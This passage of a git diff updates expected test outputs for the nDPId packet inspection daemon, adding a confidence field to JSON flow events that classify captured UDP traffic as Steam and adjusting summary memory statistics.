+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165188,"flow_last_seen":1357332165285,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.35","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165288,"flow_last_seen":1357332165310,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.178","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164888,"flow_last_seen":1357332164912,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.179","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164886,"flow_last_seen":1357332164980,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.34","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164737,"flow_last_seen":1357332164834,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.36","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165187,"flow_last_seen":1357332165344,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165088,"flow_last_seen":1357332165243,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164936,"flow_last_seen":1357332165017,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.82","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.83","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165138,"flow_last_seen":1357332165291,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164987,"flow_last_seen":1357332165148,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165238,"flow_last_seen":1357332165425,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164986,"flow_last_seen":1357332165166,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165088,"flow_last_seen":1357332165279,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164937,"flow_last_seen":1357332165121,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165337,"flow_last_seen":1357332165520,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165038,"flow_last_seen":1357332165230,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164737,"flow_last_seen":1357332164925,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164693,"flow_last_seen":1357332164876,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165087,"flow_last_seen":1357332165270,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165237,"flow_last_seen":1357332165424,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164836,"flow_last_seen":1357332165015,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164693,"flow_last_seen":1357332164892,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","total-events-serialized":263}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 104/104
@@ -269,10 +269,10 @@
 ~~ total active/idle flows...: 55/55
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4662645 bytes
-~~ total memory freed........: 4662645 bytes
-~~ total allocations/frees...: 99819/99819
+~~ total memory allocated....: 4729886 bytes
+~~ total memory freed........: 4729886 bytes
+~~ total allocations/frees...: 101409/101409
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
-~~ json string max len.......: 648 chars
-~~ json string avg len.......: 474 chars
+~~ json string max len.......: 674 chars
+~~ json string avg len.......: 487 chars
diff --git a/test/results/steam_datagram_relay_ping.pcapng.out b/test/results/steam_datagram_relay_ping.pcapng.out
index 3c45c7f31..3d2ec6599 100644
--- a/test/results/steam_datagram_relay_ping.pcapng.out
+++ b/test/results/steam_datagram_relay_ping.pcapng.out
@@ -1,9 +1,9 @@
 00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625599888890,"flow_last_seen":1625599888890,"flow_idle_time":180000,"flow_min_l4_payload_len":1300,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1300,"flow_avg_l4_payload_len":1300,"midstream":0,"ts_msec":1625599888890,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"139.45.193.10","src_port":52157,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02187{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1625599888890,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1342,"pkt_l4_len":1308,"ts_msec":1625599888890,"pkt":"eJS0JASgYDjgxTWgCABFAAUwjsUAAH8RmLPAqAJkiy3BCsu9aYoFHNuQAQFzZHBpbmeh3CnjmWUAAAAAAAA\/AQAAk6QtixMMCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625599888890,"flow_last_seen":1625599888890,"flow_idle_time":180000,"flow_min_l4_payload_len":1300,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1300,"flow_avg_l4_payload_len":1300,"midstream":0,"ts_msec":1625599888890,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"139.45.193.10","src_port":52157,"dst_port":27018,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625599888890,"flow_last_seen":1625599888890,"flow_idle_time":180000,"flow_min_l4_payload_len":1300,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1300,"flow_avg_l4_payload_len":1300,"midstream":0,"ts_msec":1625599888890,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"139.45.193.10","src_port":52157,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 02187{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1625599891412,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1342,"pkt_l4_len":1308,"ts_msec":1625599891412,"pkt":"eJS0JASgYDjgxTWgCABFAAUwjsYAAH8RmLLAqAJkiy3BCsu9aYoFHPISAQFzZHBpbmdkWlDjmWUAAAAAAAA\/AQAAk6QtixMMCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625599888890,"flow_last_seen":1625599891412,"flow_idle_time":180000,"flow_min_l4_payload_len":1300,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":2600,"flow_avg_l4_payload_len":1300,"midstream":0,"ts_msec":1625599891412,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"139.45.193.10","src_port":52157,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625599888890,"flow_last_seen":1625599891412,"flow_idle_time":180000,"flow_min_l4_payload_len":1300,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":2600,"flow_avg_l4_payload_len":1300,"midstream":0,"ts_msec":1625599891412,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"139.45.193.10","src_port":52157,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00174{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","total-events-serialized":7}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 2/2
@@ -13,9 +13,9 @@
